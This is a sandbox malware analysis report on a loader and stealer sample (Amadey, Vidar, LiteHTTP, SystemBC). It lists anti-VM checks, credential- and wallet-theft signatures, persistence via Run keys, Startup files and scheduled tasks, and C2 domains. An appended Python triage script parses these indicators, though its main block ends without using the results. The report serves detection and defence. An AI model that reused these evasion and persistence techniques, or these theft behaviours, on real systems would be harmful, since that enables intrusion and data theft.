Malware Analysis Report

2025-04-03 09:16

Sample ID 250306-bwnkgat1dz
Target bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e
SHA256 bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e
Tags
defense_evasion discovery spyware stealer amadey litehttp systembc vidar 092155 ir7am bot credential_access execution persistence trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e

Threat Level: Known bad

The file bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery spyware stealer amadey litehttp systembc vidar 092155 ir7am bot credential_access execution persistence trojan

SystemBC

Systembc family

Litehttp family

Amadey

Vidar family

Vidar

Detect Vidar Stealer

LiteHTTP

Amadey family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Blocklisted process makes network request

Downloads MZ/PE file

Reads data files stored by FTP clients

.NET Reactor protector

Drops startup file

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Unsecured Credentials: Credentials In Files

Reads user/profile data of local email clients

Checks BIOS information in registry

Identifies Wine through registry keys

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Browser Information Discovery

System Location Discovery: System Language Discovery

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 01:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 01:29

Reported

2025-03-06 01:32

Platform

win7-20241023-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 1216

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp

Files

memory/2712-0-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-1-0x00000000771C0000-0x00000000771C2000-memory.dmp

memory/2712-3-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-2-0x00000000000E1000-0x0000000000141000-memory.dmp

memory/2712-4-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-5-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-6-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-7-0x00000000000E1000-0x0000000000141000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 01:29

Reported

2025-03-06 01:32

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A (21 identical rows in the original table; no indicator, process or target recorded for any of them)

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\bxagwdt\nharnrr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xmXCfoJJ\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\240adb43ac.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\240adb43ac.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
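The anti-VM registry reads tabulated above (the VBOX__ ACPI table, SystemBiosVersion/VideoBiosVersion, Software\Wine) and the persistence artefacts in the three preceding tables (Run keys, the Startup folder, .job files under C:\Windows\Tasks) are the rows a responder pulls out of a report like this first. The Python below is an added example, not part of the report or of the sandbox that produced it: it parses the report's flattened "Description Indicator Process Target" rows (the embedded sample rows are copied verbatim from the tables above; spaces inside "Control Panel", "Start Menu" and "Program Files (x86)" are why a plain split does not work), scores each process by how many distinct anti-VM artefacts it read, and decodes the escaped Run-key data back into the paths that will run at logon. The marker list, the two-marker threshold and all function names are my own choices, not the sandbox's.

```python
"""Parse the flattened 'Description Indicator Process Target' rows of this
report into events and derive two triage views: per-process anti-VM scoring
and a persistence inventory. Added example, not part of the report; the rows
in SAMPLE_ROWS are copied verbatim from the behavioral2 tables above."""
import re
from collections import defaultdict

# Description prefixes used in the report's signature tables.
DESCRIPTIONS = (
    "File opened for modification", "Key value queried", "Set value (str)",
    "Set value (int)", "Key created", "Key opened", "File created", "N/A",
)
# Space followed by a Windows path with ONE backslash after the drive letter.
# Quoted Run-key data in the indicator uses doubled backslashes, so the
# negative lookahead refuses to split inside it.
PROC_RE = re.compile(r" (?=[A-Za-z]:\\(?!\\))")
RUN_RE = re.compile(r"\\CurrentVersion\\Run\\([^=]+?) = (.*)$")

ANTI_VM_MARKERS = {  # indicator substring -> what the registry read reveals
    r"\ACPI\DSDT\VBOX__": "VirtualBox ACPI table",
    r"\Software\Wine": "Wine registry key",
    r"\SystemBiosVersion": "system BIOS version string",
    r"\VideoBiosVersion": "video BIOS version string",
}

SAMPLE_ROWS = (  # copied from the report; the Target column is always N/A
    r'Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A',
    r'Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A',
    r'Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xmXCfoJJ\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A',
    r'File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A',
    r'File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A',
    r'N/A pastebin.com N/A N/A',
)


def parse_row(row):
    """Split a row into description, indicator and process. Spaces inside the
    indicator (Control Panel, Start Menu) or the process path (Program Files
    (x86)) defeat str.split(), so the process is located with PROC_RE."""
    row = row.strip()
    desc = next((d for d in DESCRIPTIONS if row.startswith(d + " ")), None)
    if desc is None or not row.endswith(" N/A"):
        raise ValueError("unrecognised row layout: " + row)
    rest = row[len(desc):-len(" N/A")].strip()  # drop description and Target
    match = None
    for match in PROC_RE.finditer(rest):  # keep the LAST path start
        pass
    if match:
        indicator, process = rest[:match.start()], rest[match.start() + 1:]
    else:  # no path at all, so the Process column is itself N/A
        indicator, process = rest[:-len("N/A")].strip(), "N/A"
    return {"description": desc, "indicator": indicator, "process": process}


def parse_rows(rows):
    return [parse_row(r) for r in rows]


def anti_vm_by_process(events):
    """Distinct anti-VM artefacts each process touched."""
    hits = defaultdict(set)
    for ev in events:
        if ev["process"] == "N/A":
            continue
        for marker, label in ANTI_VM_MARKERS.items():
            if marker.lower() in ev["indicator"].lower():
                hits[ev["process"]].add(label)
    return dict(hits)


def flag_anti_vm(events, min_distinct=2):
    """Processes touching at least min_distinct different artefacts. A single
    BIOS-version read is common in legitimate software, so one hit is noise."""
    return sorted(p for p, labels in anti_vm_by_process(events).items()
                  if len(labels) >= min_distinct)


def _unquote(data):
    """Undo the report's escaping of registry string data and drop the quotes."""
    return data.replace('\\"', '"').replace("\\\\", "\\").strip('"')


def persistence_inventory(events):
    """(mechanism, artefact, writing process) for the report's persistence
    signatures: Run keys, the Startup folder and Task Scheduler .job files."""
    found = []
    for ev in events:
        desc, ind, proc = ev["description"], ev["indicator"], ev["process"]
        run = RUN_RE.search(ind)
        if desc.startswith("Set value") and run:
            found.append(("Run key", f"{run.group(1)} -> {_unquote(run.group(2))}", proc))
        elif desc.startswith("File") and "\\Programs\\Startup\\" in ind:
            found.append(("Startup folder", ind, proc))
        elif desc == "File created" and ind.lower().startswith("c:\\windows\\tasks\\") \
                and ind.lower().endswith(".job"):
            found.append(("Task Scheduler .job", ind, proc))
    return found


if __name__ == "__main__":
    evs = parse_rows(SAMPLE_ROWS)
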